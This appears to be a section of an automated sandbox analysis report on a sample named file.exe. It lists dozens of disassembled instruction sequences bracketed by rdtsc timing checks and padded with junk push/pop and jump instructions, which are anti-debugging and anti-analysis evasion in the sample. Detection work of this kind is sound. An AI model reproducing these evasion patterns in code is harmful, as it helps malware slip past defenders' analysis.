                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E44399 second address: E443DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7AB12EBC93h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push esi 0x0000000d pop esi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edi 0x00000013 pop edi 0x00000014 pop eax 0x00000015 push eax 0x00000016 ja 00007F7AB12EBC86h 0x0000001c jnp 00007F7AB12EBC86h 0x00000022 pop eax 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F7AB12EBC8Ch 0x0000002d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E443DB second address: E443E1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E48EEA second address: E48F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jnl 00007F7AB12EBC8Ch 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007F7AB12EBC9Ah 0x00000016 jmp 00007F7AB12EBC94h 0x0000001b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E48F1A second address: E48F2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4907C second address: E49081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E49081 second address: E490B6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7AB0FF7766h 0x00000008 jmp 00007F7AB0FF7760h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7AB0FF7768h 0x00000017 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E490B6 second address: E490CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC8Dh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E49538 second address: E49586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7AB0FF7760h 0x00000009 popad 0x0000000a jmp 00007F7AB0FF7768h 0x0000000f pushad 0x00000010 jmp 00007F7AB0FF775Eh 0x00000015 jmp 00007F7AB0FF775Dh 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E49586 second address: E4958A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4958A second address: E4958E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D95B2A second address: D95B41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jp 00007F7AB12EBC86h 0x0000000e pushad 0x0000000f popad 0x00000010 jnp 00007F7AB12EBC86h 0x00000016 popad 0x00000017 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E56588 second address: E565B1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F7AB0FF7769h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F7AB0FF7756h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E56C97 second address: E56C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E56C9B second address: E56CCD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F7AB0FF7756h 0x0000000d push edx 0x0000000e pop edx 0x0000000f jnc 00007F7AB0FF7756h 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 pushad 0x00000019 jl 00007F7AB0FF7756h 0x0000001f jmp 00007F7AB0FF775Fh 0x00000024 popad 0x00000025 push edi 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E56CCD second address: E56CE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edi 0x00000007 jmp 00007F7AB12EBC8Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E56E2F second address: E56E35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E56E35 second address: E56E3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E56E3A second address: E56E52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7AB0FF7764h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E570D6 second address: E570DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5823D second address: E5824A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5824A second address: E5824E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E56107 second address: E5610B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5610B second address: E56116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5F833 second address: E5F84B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7AB0FF775Eh 0x00000008 je 00007F7AB0FF775Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6B1AC second address: E6B1B6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7AB12EBC86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6B1B6 second address: E6B1D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB0FF7766h 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F7AB0FF7756h 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6B1D6 second address: E6B1DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6B1DA second address: E6B1E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6ADB1 second address: E6ADBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F7AB12EBC86h 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6ADBE second address: E6ADD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7AB0FF7764h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6ADD8 second address: E6ADDD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6AF1F second address: E6AF25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6AF25 second address: E6AF2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F610 second address: E6F616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F616 second address: E6F61A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F61A second address: E6F62E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7AB0FF7756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jnl 00007F7AB0FF7756h 0x00000011 pushad 0x00000012 popad 0x00000013 pop edi 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F62E second address: E6F661 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC97h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jng 00007F7AB12EBC86h 0x00000010 jnl 00007F7AB12EBC86h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e push esi 0x0000001f pop esi 0x00000020 pop edx 0x00000021 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F661 second address: E6F66A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E729DB second address: E729F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E729F5 second address: E729FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7839D second address: E783A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jno 00007F7AB12EBC86h 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E783A9 second address: E783AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E82690 second address: E826F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F7AB12EBC97h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007F7AB12EBC8Fh 0x00000012 popad 0x00000013 jnc 00007F7AB12EBC97h 0x00000019 pushad 0x0000001a jmp 00007F7AB12EBC8Ah 0x0000001f push edi 0x00000020 pop edi 0x00000021 jmp 00007F7AB12EBC8Ah 0x00000026 popad 0x00000027 popad 0x00000028 push esi 0x00000029 jc 00007F7AB12EBCA2h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E870BA second address: E870C2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9DFCD second address: D9DFD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9DFD8 second address: D9DFE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F7AB0FF7756h 0x0000000a popad 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9DFE3 second address: D9DFE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8F6AC second address: E8F6B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8E2F4 second address: E8E312 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8E312 second address: E8E317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8E317 second address: E8E349 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7AB12EBC8Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F7AB12EBCACh 0x00000010 jmp 00007F7AB12EBC96h 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8E349 second address: E8E34D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8E5DB second address: E8E5EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7AB12EBC8Fh 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE0ED second address: DDE11C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7AB0FF7756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push ecx 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop ecx 0x00000013 pushad 0x00000014 push esi 0x00000015 pop esi 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 popad 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e push esi 0x0000001f jmp 00007F7AB0FF775Fh 0x00000024 pop esi 0x00000025 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8E8A9 second address: E8E8AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E92DAB second address: E92DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7AB0FF7756h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F7AB0FF7763h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA302A second address: EA302E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA302E second address: EA303A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA303A second address: EA3044 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7AB12EBC86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA3044 second address: EA304D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA304D second address: EA306A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7AB12EBC8Ch 0x00000009 ja 00007F7AB12EBC86h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA306A second address: EA3099 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB0FF7767h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jnp 00007F7AB0FF7768h 0x00000010 pushad 0x00000011 jng 00007F7AB0FF7756h 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA4965 second address: EA49A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC91h 0x00000007 ja 00007F7AB12EBC99h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7AB12EBC8Bh 0x00000017 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA49A1 second address: EA49AB instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7AB0FF7756h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA47F2 second address: EA47F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA47F8 second address: EA47FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECD344 second address: ECD38E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 jmp 00007F7AB12EBC91h 0x0000000c push eax 0x0000000d jo 00007F7AB12EBC86h 0x00000013 pop eax 0x00000014 popad 0x00000015 pushad 0x00000016 jbe 00007F7AB12EBC9Ah 0x0000001c jmp 00007F7AB12EBC94h 0x00000021 je 00007F7AB12EBC92h 0x00000027 jo 00007F7AB12EBC86h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECD38E second address: ECD3B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7AB0FF7769h 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECC506 second address: ECC50A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECC62E second address: ECC632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECC632 second address: ECC640 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jg 00007F7AB12EBC86h 0x0000000d pop eax 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECC640 second address: ECC659 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7AB0FF7763h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECC7BA second address: ECC7BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECCC1A second address: ECCC46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7AB0FF775Ah 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7AB0FF7769h 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED12F5 second address: ED12FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED12FA second address: ED1300 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED1300 second address: ED1304 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED1304 second address: ED1321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F7AB0FF775Eh 0x00000011 push eax 0x00000012 pop eax 0x00000013 popad 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED14E4 second address: ED14E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED1834 second address: ED183A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED183A second address: ED183F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED183F second address: ED1856 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7AB0FF7763h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED2F6D second address: ED2F86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F7AB12EBC92h 0x0000000b popad 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4940063 second address: 49400B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7AB0FF7763h 0x00000009 sbb cx, 43EEh 0x0000000e jmp 00007F7AB0FF7769h 0x00000013 popfd 0x00000014 mov esi, 2E44AB77h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov ebp, esp 0x0000001e jmp 00007F7AB0FF775Ah 0x00000023 pop ebp 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 mov al, 9Ch 0x00000029 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4980014 second address: 498001A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 498001A second address: 498006B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F7AB0FF7766h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F7AB0FF775Dh 0x0000001a xor eax, 7B8CA316h 0x00000020 jmp 00007F7AB0FF7761h 0x00000025 popfd 0x00000026 mov esi, 2C9F9187h 0x0000002b popad 0x0000002c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 498006B second address: 4980083 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 37ECFF9Eh 0x00000008 mov edx, 01A577AAh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4980083 second address: 4980087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4980087 second address: 49800A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49800A1 second address: 49800FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7AB0FF7761h 0x00000009 add si, E086h 0x0000000e jmp 00007F7AB0FF7761h 0x00000013 popfd 0x00000014 jmp 00007F7AB0FF7760h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F7AB0FF7767h 0x00000024 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49800FA second address: 4980100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
